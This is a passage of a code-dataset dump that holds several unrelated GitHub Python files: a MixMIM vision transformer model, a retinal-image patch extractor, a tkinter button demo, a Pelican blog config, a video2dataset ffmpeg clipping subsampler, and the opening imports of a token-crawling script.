attn_mask=None):\n H, W = self.input_resolution\n B, L, C = x.shape\n\n shortcut = x\n x = self.norm1(x)\n x = x.view(B, H, W, C)\n\n # partition windows\n x_windows = window_partition(x, self.window_size) # nW*B, window_size, window_size, C\n x_windows = x_windows.view(-1, self.window_size * self.window_size, C) # nW*B, window_size*window_size, C\n if attn_mask is not None:\n attn_mask = attn_mask.repeat(B, 1, 1) # B, N, 1\n attn_mask = attn_mask.view(B, H, W, 1)\n attn_mask = window_partition(attn_mask, self.window_size)\n attn_mask = attn_mask.view(-1, self.window_size * self.window_size, 1)\n\n # W-MSA/SW-MSA\n attn_windows = self.attn(x_windows, mask=attn_mask) # nW*B, window_size*window_size, C\n\n # merge windows\n attn_windows = attn_windows.view(-1, self.window_size, self.window_size, C)\n x = window_reverse(attn_windows, self.window_size, H, W) # B H' W' C\n\n x = x.view(B, H * W, C)\n\n x = shortcut + self.drop_path(x)\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n\n return x\n\n\nclass MixMIMLayer(nn.Module):\n\n def __init__(self, dim, input_resolution, depth, num_heads, window_size,\n mlp_ratio=4., qkv_bias=True, drop=0., attn_drop=0.,\n drop_path=0., norm_layer=nn.LayerNorm, downsample=None, \n use_checkpoint=False):\n\n super().__init__()\n self.dim = dim\n self.input_resolution = input_resolution\n self.depth = depth\n self.use_checkpoint = use_checkpoint\n\n # build blocks\n self.blocks = nn.ModuleList()\n for i in range(depth):\n self.blocks.append(\n MixMIMBlock(\n dim=dim, input_resolution=input_resolution, num_heads=num_heads, \n window_size=window_size, mlp_ratio=mlp_ratio,\n qkv_bias=qkv_bias, drop=drop, attn_drop=attn_drop,\n drop_path=drop_path[i] if isinstance(drop_path, list) else drop_path, \n norm_layer=norm_layer)\n )\n # patch merging layer\n if downsample is not None:\n self.downsample = downsample(input_resolution, dim=dim, norm_layer=norm_layer)\n else:\n self.downsample = None\n\n def forward(self, x, attn_mask=None):\n for blk in self.blocks:\n if self.use_checkpoint:\n x = checkpoint(blk, x, attn_mask)\n else:\n x = blk(x, attn_mask=attn_mask)\n if self.downsample is not None:\n x = self.downsample(x)\n return x\n\n def extra_repr(self) -> str:\n return f\"dim={self.dim}, input_resolution={self.input_resolution}, depth={self.depth}\"\n\n\nclass MixMIM(nn.Module):\n def __init__(self, decoder_dim=512, decoder_depth=8, decoder_num_heads=16, \n mlp_ratio=4, norm_pix_loss=True, \n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=96, depths=[2, 2, 18, 2], num_heads=[3, 6, 12, 24],\n window_size=[7, 7, 14, 7], qkv_bias=True, qk_scale=None, patch_norm=True,\n drop_rate=0.0, drop_path_rate=0.0, attn_drop_rate=0.0, \n norm_layer=nn.LayerNorm, use_checkpoint=False, range_mask_ratio=0.0, **kwargs):\n super().__init__()\n # decoder args\n self.decoder_dim = decoder_dim\n self.decoder_depth = decoder_depth\n self.decoder_num_heads = decoder_num_heads\n\n # encoder args\n self.encoder_stride = 32\n self.embed_dim = embed_dim\n self.patch_norm = patch_norm\n self.depths = depths\n self.num_layers = len(depths)\n self.num_heads = num_heads\n self.qkv_bias = qkv_bias\n self.drop_rate = drop_rate\n self.attn_drop_rate = attn_drop_rate\n self.use_checkpoint = use_checkpoint\n self.img_size = img_size\n self.mlp_ratio = mlp_ratio\n self.window_size = window_size\n self.num_features = int(embed_dim * 2 ** (self.num_layers - 1))\n\n # reconstruction args\n self.norm_pix_loss = norm_pix_loss\n self.range_mask_ratio = range_mask_ratio\n\n # split image into non-overlapping patches\n self.patch_embed = PatchEmbed(\n img_size=img_size, patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim,\n norm_layer=norm_layer if self.patch_norm else None)\n num_patches = self.patch_embed.num_patches\n self.patch_grid = self.patch_embed.grid_size\n\n self.dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] # stochastic depth decay rule\n\n # build layers\n self.layers = nn.ModuleList()\n for i_layer in range(self.num_layers):\n self.layers.append(MixMIMLayer(\n dim=int(self.embed_dim * 2 ** i_layer),\n input_resolution=(self.patch_grid[0] // (2 ** i_layer), self.patch_grid[1] // (2 ** i_layer)),\n depth=self.depths[i_layer],\n num_heads=self.num_heads[i_layer],\n window_size=self.window_size[i_layer],\n mlp_ratio=self.mlp_ratio,\n qkv_bias=self.qkv_bias,\n drop=self.drop_rate,\n attn_drop=self.attn_drop_rate,\n drop_path=self.dpr[sum(self.depths[:i_layer]):sum(self.depths[:i_layer + 1])],\n norm_layer=norm_layer,\n downsample=PatchMerging if (i_layer < self.num_layers - 1) else None,\n use_checkpoint=self.use_checkpoint)\n )\n self.pos_drop = nn.Dropout(p=drop_rate)\n self.norm = norm_layer(self.num_features)\n\n self.mask_token = nn.Parameter(torch.zeros(1, 1, self.decoder_dim))\n trunc_normal_(self.mask_token, mean=0., std=.02)\n\n num_patches = self.patch_embed.num_patches\n out_num_patches = (self.img_size // self.encoder_stride) ** 2\n self.out_num_patches = out_num_patches\n self.absolute_pos_embed = nn.Parameter(torch.zeros(1, num_patches, self.embed_dim), requires_grad=False)\n self.decoder_pos_embed = nn.Parameter(torch.zeros(1, out_num_patches, decoder_dim), requires_grad=False)\n\n self.decoder_embed = nn.Linear(self.num_features, decoder_dim)\n self.decoder_blocks = nn.ModuleList([\n Block(decoder_dim, decoder_num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer)\n for i in range(decoder_depth)])\n\n self.decoder_norm = norm_layer(decoder_dim)\n self.decoder_pred = nn.Linear(\n decoder_dim,\n self.encoder_stride ** 2 * 3\n )\n\n self.initialize_weights()\n\n def initialize_weights(self):\n # initialization\n # initialize (and freeze) pos_embed by sin-cos embedding\n pos_embed = get_2d_sincos_pos_embed(self.absolute_pos_embed.shape[-1], \\\n int(self.patch_embed.num_patches**.5), cls_token=False)\n self.absolute_pos_embed.data.copy_(torch.from_numpy(pos_embed).float().unsqueeze(0))\n\n decoder_pos_embed = get_2d_sincos_pos_embed(self.decoder_pos_embed.shape[-1], \\\n int(self.out_num_patches**.5), cls_token=False)\n self.decoder_pos_embed.data.copy_(torch.from_numpy(decoder_pos_embed).float().unsqueeze(0))\n\n # initialize nn.Linear and nn.LayerNorm\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Linear):\n # we use xavier_uniform following official JAX ViT:\n torch.nn.init.xavier_uniform_(m.weight)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\n\n def random_masking(self, x, mask_ratio):\n B, C, H, W = x.shape\n out_H = H // self.encoder_stride\n out_W = W // self.encoder_stride\n s3_H, s3_W = out_H * 2, out_W * 2\n s2_H, s2_W = out_H * 4, out_W * 4\n s1_H, s1_W = out_H * 8, out_W * 8\n\n seq_l = out_H * out_W\n # use a shared mask for a batch images\n mask = torch.zeros([1, 1, seq_l], device=x.device)\n\n mask_ratio = mask_ratio + random.uniform(0.0, self.range_mask_ratio)\n noise = torch.rand(1, 1, seq_l, device=x.device) # noise in [0, 1]\n # ascend: small is keep, large is remove\n mask_idx = torch.argsort(noise, dim=2)[:, :, :int(seq_l * mask_ratio)]\n mask.scatter_(2, mask_idx, 1)\n mask = mask.reshape(1, 1, out_H, out_W)\n mask_s1 = torch.nn.functional.interpolate(mask, size=(s1_H, s1_W), mode='nearest')\n mask_s2 = torch.nn.functional.interpolate(mask, size=(s2_H, s2_W), mode='nearest')\n mask_s3 = torch.nn.functional.interpolate(mask, size=(s3_H, s3_W), mode='nearest')\n\n mask = mask.reshape(1, out_H * out_W, 1).contiguous()\n mask_s1 = mask_s1.reshape(1, s1_H * s1_W, 1).contiguous()\n mask_s2 = mask_s2.reshape(1, s2_H * s2_W, 1).contiguous()\n mask_s3 = mask_s3.reshape(1, s3_H * s3_W, 1).contiguous()\n\n return mask_s1, mask_s2, mask_s3, mask\n\n def patchify(self, imgs):\n \"\"\"\n imgs: (N, 3, H, W)\n x: (N, L, patch_size**2 *3)\n \"\"\"\n p = self.encoder_stride\n assert imgs.shape[2] == imgs.shape[3] and imgs.shape[2] % p == 0\n\n h = w = imgs.shape[2] // p\n x = imgs.reshape(shape=(imgs.shape[0], 3, h, p, w, p))\n x = torch.einsum('nchpwq->nhwpqc', x)\n x = x.reshape(shape=(imgs.shape[0], h * w, p**2 * 3))\n return x\n\n def unpatchify(self, x):\n \"\"\"\n x: (N, L, patch_size**2 *3)\n imgs: (N, 3, H, W)\n \"\"\"\n p = self.encoder_stride\n h = w = int(x.shape[1]**.5)\n assert h * w == x.shape[1]\n\n x = x.reshape(shape=(x.shape[0], h, w, p, p, 3))\n x = torch.einsum('nhwpqc->nchpwq', x)\n imgs = x.reshape(shape=(x.shape[0], 3, h * p, h * p))\n return imgs\n\n def forward_encoder(self, x, mask_s1, mask_s2, mask_s3, mask_s4):\n x = self.patch_embed(x)\n\n B, L, _ = x.shape\n H = W = int(L ** 0.5)\n\n x = x * (1. - mask_s1) + x.flip(0) * mask_s1\n x = x + self.absolute_pos_embed\n x = self.pos_drop(x)\n\n for idx, layer in enumerate(self.layers):\n if idx == 0:\n x = layer(x, attn_mask=mask_s1)\n elif idx == 1:\n x = layer(x, attn_mask=mask_s2)\n elif idx == 2:\n x = layer(x, attn_mask=mask_s3)\n elif idx == 3:\n x = layer(x, attn_mask=mask_s4)\n x = self.norm(x)\n\n return x\n\n def forward_decoder(self, x, mask):\n # embed tokens\n x = self.decoder_embed(x)\n B, L, C = x.shape\n\n mask_tokens = self.mask_token.expand(B, L, -1)\n x1 = x * (1 - mask) + mask_tokens * mask\n x2 = x * mask + mask_tokens * (1 - mask)\n x = torch.cat([x1, x2], dim=0)\n\n # add pos embed\n x = x + self.decoder_pos_embed\n\n # apply Transformer blocks\n for idx, blk in enumerate(self.decoder_blocks):\n x = blk(x)\n x = self.decoder_norm(x)\n\n # predictor projection\n x = self.decoder_pred(x)\n\n return x\n\n def forward_loss(self, x, x_rec, mask):\n B, L, C = x_rec.shape\n\n # unmix tokens\n x1_rec = x_rec[:B//2]\n x2_rec = x_rec[B//2:]\n\n target = self.patchify(x)\n if self.norm_pix_loss:\n mean = target.mean(dim=-1, keepdim=True)\n var = target.var(dim=-1, keepdim=True)\n target = (target - mean) / (var + 1.e-6)**.5\n\n unmix_x_rec = x1_rec * mask + x2_rec.flip(0) * (1 - mask)\n loss_rec = (unmix_x_rec - target) ** 2\n loss_rec = loss_rec.mean()\n\n return loss_rec\n\n def forward(self, x, mask_ratio=0.5):\n\n mask_s1, mask_s2, mask_s3, mask_s4 = self.random_masking(x, mask_ratio)\n z = self.forward_encoder(x, mask_s1, mask_s2, mask_s3, mask_s4)\n x_rec = self.forward_decoder(z, mask_s4)\n loss = self.forward_loss(x, x_rec, mask_s4)\n return loss, x_rec, mask_s4\n\n @torch.jit.ignore\n def no_weight_decay(self):\n return {'mask_token'}\n\n\n@register_model\ndef mixmim_base(**kwargs):\n default_args = dict(\n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=128, depths=[2, 2, 18, 2], num_heads=[4, 8, 16, 32],\n window_size=[14, 14, 14, 7], mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, drop_path_rate=0.0, \n patch_norm=True, use_checkpoint=False,\n decoder_dim=512, decoder_depth=8, decoder_num_heads=16,\n )\n default_args.update(**kwargs)\n model = MixMIM(**default_args)\n\n return model\n\n\n@register_model\ndef mixmim_large(**kwargs):\n default_args = dict(\n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=192, depths=[2, 2, 18, 2], num_heads=[6, 12, 24, 48],\n window_size=[14, 14, 14, 7], mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, drop_path_rate=0.0, \n patch_norm=True, use_checkpoint=False,\n decoder_dim=512, decoder_depth=8, decoder_num_heads=16,\n )\n default_args.update(**kwargs)\n model = MixMIM(**default_args)\n\n return model\n\n\n@register_model\ndef mixmim_huge(**kwargs):\n default_args = dict(\n img_size=224, patch_size=4, in_chans=3, num_classes=0,\n embed_dim=352, depths=[2, 2, 18, 2], num_heads=[11, 22, 44, 88],\n window_size=[14, 14, 14, 7], mlp_ratio=4, qkv_bias=True, qk_scale=None,\n drop_rate=0.0, drop_path_rate=0.0, \n patch_norm=True, use_checkpoint=False,\n decoder_dim=512, decoder_depth=8, decoder_num_heads=16,\n )\n default_args.update(**kwargs)\n model = MixMIM(**default_args)\n\n return model\n","repo_name":"Sense-X/MixMIM","sub_path":"models_mixmim.py","file_name":"models_mixmim.py","file_ext":"py","file_size_in_byte":18669,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"54"} +{"seq_id":"37302505773","text":"'''\r\nCreated on 27-Dec-2019\r\n\r\n@author: E75337\r\n'''\r\n\r\n# data_path = 'D:/MoNuSAC_images_and_annotations/resize_images/'\r\n# label_path= 'D:/MoNuSAC_images_and_annotations/resize_images/resize_label/'\r\n# path2write_label= 'D:/MoNuSAC_images_and_annotations/resize_images/resize_label/patch_label/'\r\n# path2write_img= 'D:/MoNuSAC_images_and_annotations/resize_images/resize_label/patches/'\r\n\r\ndata_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/images/val/data/'\r\nlabel_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/images/val/mask/'\r\n\r\n# data_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/Data/Processed/images/training/scar/'\r\n# label_path = 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/Data/Processed/masks/training/scar/'\r\n\r\npath2write_img= 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/patches/val/data/'\r\npath2write_label= 'Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/New_data/exudates/patches/val/mask/'\r\n\r\n# path2write='Z:/Ravi K/Other/ISBI_2019_challenge/iChallenge_AMD/Task_3/Data/Processed/Patches/binary_class/exudate/'\r\n\r\ndata_extention='.jpg'\r\nlabel_extention='.png'\r\nimport math\r\nimport os\r\nimport glob \r\nimport cv2\r\nimport numpy as np\r\n# os.makedirs(path2write_label)\r\n# os.makedirs(path2write_img)\r\n# height=512\r\n# width=512\r\nclasses=2\r\ndef binarylabel(im_label,width,height):\r\n im_label=im_label.astype('uint8')\r\n lab=np.zeros([width,height,classes],dtype=\"uint8\")\r\n for i in range(width):\r\n for j in range(height):\r\n lab[i,j,im_label[i][j]]=1\r\n return lab\r\ndata=[] \r\nlabel=[]\r\nw=[]\r\nh=[]\r\nfor filename in glob.glob(label_path+'*'+label_extention):\r\n #print(filename)\r\n # Read the label data \r\n print(filename)\r\n pat= filename.split(label_extention)[0]\r\n im_label = cv2.imread(filename,0)\r\n print(np.unique(im_label))\r\n \r\n pat1=pat.split(\"\\\\\")[-1]\r\n im = cv2.imread(data_path+pat1+data_extention)\r\n \r\n in_ = np.array(im_label, dtype=np.float32)\r\n width, height = in_.shape;\r\n tileSize = 512.0\r\n rloop = int(math.ceil(width/tileSize))\r\n cloop = int(math.ceil(height/tileSize))\r\n out_ = np.zeros((width,height),dtype=np.float32)\r\n# out_ = np.ones((width,height),dtype=np.float32)\r\n out_ = out_*255\r\n for i in range(rloop):\r\n for j in range(cloop):\r\n step_i = min(int(tileSize),width-i*int(tileSize))\r\n step_j = min(int(tileSize),height-j*int(tileSize))\r\n in_1 = np.zeros((int(tileSize),int(tileSize)),dtype=np.float32)\r\n in_im = np.zeros((int(tileSize),int(tileSize),3),dtype=np.float32)\r\n in_1[0:step_i,0:step_j] = in_[i*int(tileSize):i*int(tileSize)+step_i,j*int(tileSize):j*int(tileSize)+step_j]\r\n cv2.imwrite(path2write_label+pat1+'_'+str(i)+'_'+str(j)+'.png',in_1.astype('uint8'))\r\n \r\n in_im[0:step_i,0:step_j,:] = im[i*int(tileSize):i*int(tileSize)+step_i,j*int(tileSize):j*int(tileSize)+step_j,:]\r\n cv2.imwrite(path2write_img+pat1+'_'+str(i)+'_'+str(j)+'.jpg',in_im.astype('uint8'))\r\n \r\n# b_ch=104.00699\r\n# g_ch=116.66877\r\n# r_ch=122.67892\r\n# \r\n# im_ = in_im.astype(\"float32\")\r\n# #Individual channel-wise mean substraction\r\n# im_ -= np.array((b_ch,g_ch,r_ch))\r\n# \r\n# \r\n# # # # Compute standard deviation\r\n# # b_ch=np.std(im[:,:,0])\r\n# # g_ch=np.std(im[:,:,1])\r\n# # r_ch=np.std(im[:,:,2])\r\n# # \r\n# # #Individual channel-wise standard deviation division\r\n# # im_ /= np.array((b_ch,g_ch,r_ch))\r\n# \r\n# \r\n# #Append Images into corresponding List\r\n# data.append(np.rollaxis((im_),2)) \r\n# #Convert label into binary form\r\n# # lab = binarylabel(in_1,width,height)\r\n# # in_1= np.where(in_1<4,0,in_1)\r\n# # in_1= np.where(in_1>4,0,in_1)\r\n# # print(np.unique(in_1))\r\n# # in_1= np.where(in_1==255,1,in_1)\r\n# print(np.unique(in_1))\r\n# lab = binarylabel(in_1,1024,1024)\r\n# \r\n# #Append Images into corresponding List\r\n# label.append(((lab)))\r\n \r\n# print('\\n'+tile_name[-1])\r\n# else:\r\n# print(\"error: \"+tile_name[-1])\r\n \r\n \r\n# np.save(path2write+data_fileName,np.array(data))\r\n# np.save(path2write+label_fileName,np.array(label)) \r\n\r\n# cv2.imwrite(pat+'.png',51*im_label)\r\n# print(np.unique(im_label))\r\n# w.append(im_label.shape[0]) \r\n# h.append(im_label.shape[1])\r\n# print(min(w),'and', min(h))\r\n# print(max(w),'and', max(h))\r\n\r\n\r\n","repo_name":"Ravimk07/Retinal-Image-Analysis","sub_path":"Extract_patches_R.py","file_name":"Extract_patches_R.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"31541461955","text":"from tkinter import *\r\n\r\ndef on():\r\n print(\"On\")\r\n return\r\n\r\nroot = Tk()\r\n\r\nroot.geometry(\"600x300\")\r\nroot.minsize(600,300)\r\nroot.maxsize(600,300)\r\n\r\nf1 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf1.pack(side = LEFT,fill = BOTH)\r\nb1 = Button(f1, bg = \"#3586c4\", text = \"Bulb1\", command = on)\r\nb1.pack(side = TOP)\r\n\r\nf2 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf2.pack(side = LEFT,fill = BOTH)\r\nb2 = Button(f2, bg = \"#3586c4\", text = \"Bulb2\", command = on)\r\nb2.pack(side = BOTTOM, fill = BOTH)\r\n\r\nf3 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf3.pack(side = LEFT,fill = BOTH)\r\nb3 = Button(f3, bg = \"#3586c4\", text = \"Bulb3\", command = on)\r\nb3.pack(side = TOP)\r\n\r\nf4 = Frame(root, bg = \"grey\", padx = 40, pady = 40, \r\nborderwidth = 5, relief = RIDGE)\r\nf4.pack(side = LEFT, fill = BOTH)\r\nb4 = Button(f4, bg = \"#3586c4\", text = \"Bulb4\", command = on)\r\nb4.pack(side = TOP)\r\nroot.mainloop()","repo_name":"aiyush/TkinterApps","sub_path":"tut5buttons.py","file_name":"tut5buttons.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29284912291","text":"import markdown\n\nAUTHOR = \"Charles Monod-Broca\"\nSITENAME = \"Let's tame that python together\"\n\nPATH = \"content\"\n\nTHEME = \"pelican-clean-blog\"\n\nTIMEZONE = \"Europe/Paris\"\n\nDEFAULT_LANG = \"fr\"\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n\n# Blogroll\nLINKS = (\n (\"Pelican\", \"https://getpelican.com/\"),\n (\"Python.org\", \"https://www.python.org/\"),\n (\"Jinja2\", \"https://palletsprojects.com/p/jinja/\"),\n (\"You can modify those links in your config file\", \"#\"),\n)\n\n# Social widget\nSOCIAL = (\n (\"You can add links in your config file\", \"#\"),\n (\"Another social link\", \"#\"),\n)\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\n# RELATIVE_URLS = True\n\nOUTPUT_PATH = \"docs/\"\n\n# SITEURL = \"https://steampunkislande.github.io\"\nSITEURL = \"\"\n\nMARKDOWN = {\n \"extensions\": [\n \"markdown_include.include\",\n \"markdown_link_attr_modifier\",\n \"pymdownx.highlight\",\n \"markdown_fenced_code_tabs\",\n ],\n \"extension_configs\": {\n \"markdown.extensions.codehilite\": {\"css_class\": \"highlight\"},\n \"markdown_link_attr_modifier\": {\n \"new_tab\": \"on\",\n \"no_referrer\": \"external_only\",\n \"auto_title\": \"on\",\n },\n \"markdown_fenced_code_tabs\": {\n \"single_block_as_tab\": False,\n \"active_class\": \"active\",\n \"template\": \"default\",\n },\n },\n \"output_format\": \"html5\",\n}\n","repo_name":"SteampunkIslande/SteampunkIslande.github.io","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2937443797","text":"\"\"\"\nclipping subsampler turns full videos into clips of videos according to clip_col\n\"\"\"\nimport os\nimport copy\nimport glob\nimport ffmpeg\nimport tempfile\nfrom collections.abc import Iterable\n\nimport datetime\nfrom .subsampler import Subsampler\n\n\ndef _get_seconds(t):\n if not isinstance(t, str):\n return float(t) # already seconds\n time_format = \"%H:%M:%S.%f\" # TODO: maybe parameterize this?\n t_obj = datetime.datetime.strptime(t, time_format).time()\n return t_obj.second + t_obj.microsecond / 1e6 + t_obj.minute * 60 + t_obj.hour * 3600\n\n\ndef _get_strtime(t_sec):\n hour = int(t_sec // 3600)\n minute = int((t_sec // 60) % 60)\n second = int(t_sec % 60)\n # Use round to solve machine error problem (e.g. t_sec=13.6)\n microsecond = round((t_sec - int(t_sec)) * 1000)\n return f\"{hour:02d}:{minute:02d}:{second:02d}.{microsecond:03d}\"\n\n\ndef _split_time_frame(s, e, min_length, max_length):\n \"\"\"Filters out cuts by min and max length\"\"\"\n time_d = e - s\n time_frames = [\n (s + i * max_length, min(s + (i + 1) * max_length, e))\n for i in range(int(time_d // max_length) + (1 if time_d % max_length > 0 else 0))\n ]\n if len(time_frames) == 0:\n return []\n last_time_d = time_frames[-1][1] - time_frames[-1][0]\n time_frames = time_frames if last_time_d >= min_length else time_frames[:-1]\n return time_frames\n\n\ndef _adjust_ranges_to_keyframes(ranges, keyframes):\n \"\"\"Translates ranges into keyframe vocab\"\"\"\n adjusted_ranges = []\n for start, end in ranges:\n keyframes_in_range = [k for k in keyframes if start <= k <= end]\n if keyframes_in_range:\n adjusted_start = min(keyframes_in_range)\n adjusted_end = max(keyframes_in_range)\n if adjusted_start != adjusted_end:\n adjusted_ranges.append((adjusted_start, adjusted_end))\n return adjusted_ranges\n\n\nclass ClippingSubsampler(Subsampler):\n \"\"\"\n Cuts videos up into segments according to the 'clips' metadata\n\n Parameters:\n oom_clip_count: int\n The number of orders of magnitude for clip count, used for formatting clip keys.\n encode_formats: dict\n A dictionary mapping stream keys to their corresponding file extensions, e.g., {\"video\": \"mp4\", \"audio\": \"mp3\"}.\n min_length: float optional (default=0.0)\n Minimum length in seconds of a clip. Below this the subsampler will reject the clips\n max_length: float optional (default=999999.0)\n Maximum clip length, if exceeded resolve according to max_length_strategy\n max_length_strategy: str optional (defaul=\"all\")\n \"all\" - cut up long clip into as many clips of max_length as possible\n \"first\" - take the first max_length clip from the long clip\n precision: str, optional (default=\"low\")\n \"low\" - splits can be imprecise in any direction\n \"keyframe_adjusted\" - translates cuts into the vocab of existing keyframes (a good middlepoint)\n useful if you need to do fast clipping but information can't cross cut boundries\n \"exact\" - keyframes are inserted to get exact splits (warning, slow)\n\n expects:\n - clips to be sorted in increasing order and non-overlapping\n - time to be in the format \"%H:%M:%S.%f\", or a number representing the second of the timestamp\n \"\"\"\n\n def __init__(\n self,\n oom_clip_count,\n encode_formats,\n min_length=0.0,\n max_length=999999.0,\n max_length_strategy=\"all\",\n precision=\"low\",\n ):\n self.oom_clip_count = oom_clip_count\n self.encode_formats = encode_formats\n self.min_length = min_length\n self.max_length, self.max_length_strategy = max_length, max_length_strategy\n assert precision in [\"exact\", \"low\", \"keyframe_adjusted\"]\n self.precision = precision\n\n def __call__(self, streams, metadata):\n clips = metadata.pop(\"clips\")\n\n if not isinstance(clips[0], Iterable): # make sure clips looks like [[start, end]] and not [start, end]\n clips = [clips]\n\n is_strtime = isinstance(clips[0][0], str)\n\n if self.precision == \"keyframe_adjusted\":\n # TODO: make it so if not present, get it yourself\n keyframe_timestamps = metadata[\"video_metadata\"].pop(\"keyframe_timestamps\")\n s_clips = [[_get_seconds(s), _get_seconds(e)] for (s, e) in clips]\n clips = _adjust_ranges_to_keyframes(s_clips, keyframe_timestamps)\n\n filtered_clips = []\n for s, e in clips:\n max_len_clips = _split_time_frame(_get_seconds(s), _get_seconds(e), self.min_length, self.max_length)\n\n if self.max_length_strategy == \"first\":\n max_len_clips = max_len_clips[:1]\n\n filtered_clips += max_len_clips\n clips = filtered_clips\n\n if len(clips) == 0:\n # return an error\n return {}, [], f\"Video had no clips longer than {self.min_length}\"\n\n start_0 = _get_seconds(clips[0][0]) == 0.0\n\n ind = 1 + int(not start_0)\n s_p, e_p = clips[0]\n s_p, e_p = _get_seconds(s_p), _get_seconds(e_p)\n splits = (not start_0) * [s_p] + [e_p]\n # list of indicies of clips to take, used to discard non-contiguous sections\n take_inds = [int(not start_0)]\n\n # TODO: make nicer\n for s, e in clips[1:]:\n s, e = _get_seconds(s), _get_seconds(e)\n\n if s == e_p: # situations like [0, 1], [1, 2], [2, 3] -> 1, 2\n splits += [e]\n take_inds.append(ind)\n ind += 1\n else:\n splits += [s, e]\n take_inds.append(ind + 1)\n ind += 2\n e_p = e\n\n segment_times = \",\".join([str(spl) for spl in splits])\n streams_clips = {}\n\n for k in streams.keys():\n stream_bytes = streams[k][0] # pre-broadcast so only one\n if stream_bytes is None:\n continue\n encode_format = self.encode_formats[k]\n\n with tempfile.TemporaryDirectory() as tmpdir:\n # TODO: we need to put the extension into the metadata\n # TODO: This can be done better using pipes I just don't feel like sinking too much time into this rn\n with open(os.path.join(tmpdir, f\"input.{encode_format}\"), \"wb\") as f:\n f.write(stream_bytes)\n try:\n kwargs = {\n \"map\": 0,\n \"f\": \"segment\",\n \"segment_times\": segment_times,\n \"reset_timestamps\": 1,\n }\n\n # Precision things, tradeoff for speed\n if self.precision != \"exact\":\n kwargs[\"c\"] = \"copy\"\n else:\n kwargs[\"force_key_frames\"] = segment_times\n\n _ = (\n ffmpeg.input(f\"{tmpdir}/input.{encode_format}\")\n .output(f\"{tmpdir}/clip_%d.{encode_format}\", **kwargs)\n .run(capture_stdout=True, quiet=True)\n )\n\n except Exception as err: # pylint: disable=broad-except\n return {}, [], str(err)\n\n stream_clips = glob.glob(f\"{tmpdir}/clip*.{encode_format}\")\n stream_clips.sort(key=lambda x: int(x.split(\"_\")[-1].split(\".\")[0]))\n\n correct_clips = []\n for clip_id, (clip, ind) in enumerate(zip(clips, take_inds)):\n if ind < len(stream_clips):\n correct_clips.append((clip_id, clip, stream_clips[ind]))\n # clips_lost = len(take_inds) - len(correct_clips) # TODO report this somehow\n\n stream_clips, metadata_clips = [], []\n for clip_id, clip_span, clip_pth in correct_clips:\n with open(clip_pth, \"rb\") as vid_f:\n clip_bytes = vid_f.read()\n stream_clips.append(clip_bytes)\n\n clip_key = \"{clip_id:0{oom_clip_count}d}\".format( # pylint: disable=consider-using-f-string\n clip_id=clip_id, oom_clip_count=self.oom_clip_count\n )\n meta_clip = copy.deepcopy(metadata)\n # set the timeframe of this clip\n if is_strtime:\n # Keep clips in the original format to be compatible with the data schema.\n meta_clip[\"clips\"] = [(_get_strtime(clip_span[0]), _get_strtime(clip_span[1]))]\n else:\n meta_clip[\"clips\"] = [clip_span]\n meta_clip[\"key\"] = f\"{meta_clip['key']}_{clip_key}\"\n\n yt_md_dict = meta_clip.get(\"yt_meta_dict\", {})\n if (yt_md_dict is not None) and (yt_md_dict.get(\"subtitles\", None) is not None):\n clip_subtitles = []\n s_c, e_c = _get_seconds(clip_span[0]), _get_seconds(clip_span[1])\n for line in meta_clip[\"yt_meta_dict\"][\"subtitles\"]:\n s, e = _get_seconds(line[\"start\"]), _get_seconds(line[\"end\"])\n if max(s_c, s) < min(e_c, e):\n clip_subtitles.append(line)\n elif s > e_c:\n break\n # full video subtitles might still be useful for context\n meta_clip[\"clip_subtitles\"] = clip_subtitles\n\n metadata_clips.append(meta_clip)\n\n streams_clips[k] = stream_clips\n\n return streams_clips, metadata_clips, None\n","repo_name":"iejMac/video2dataset","sub_path":"video2dataset/subsamplers/clipping_subsampler.py","file_name":"clipping_subsampler.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"54"} +{"seq_id":"74373125920","text":"import sys\nimport requests\nimport datetime\n\nsys.path.append('./get_info_api')\nimport moralis\nsys.path.append('./')\nimport crawl_data_api.crawl_from_bsc_token as 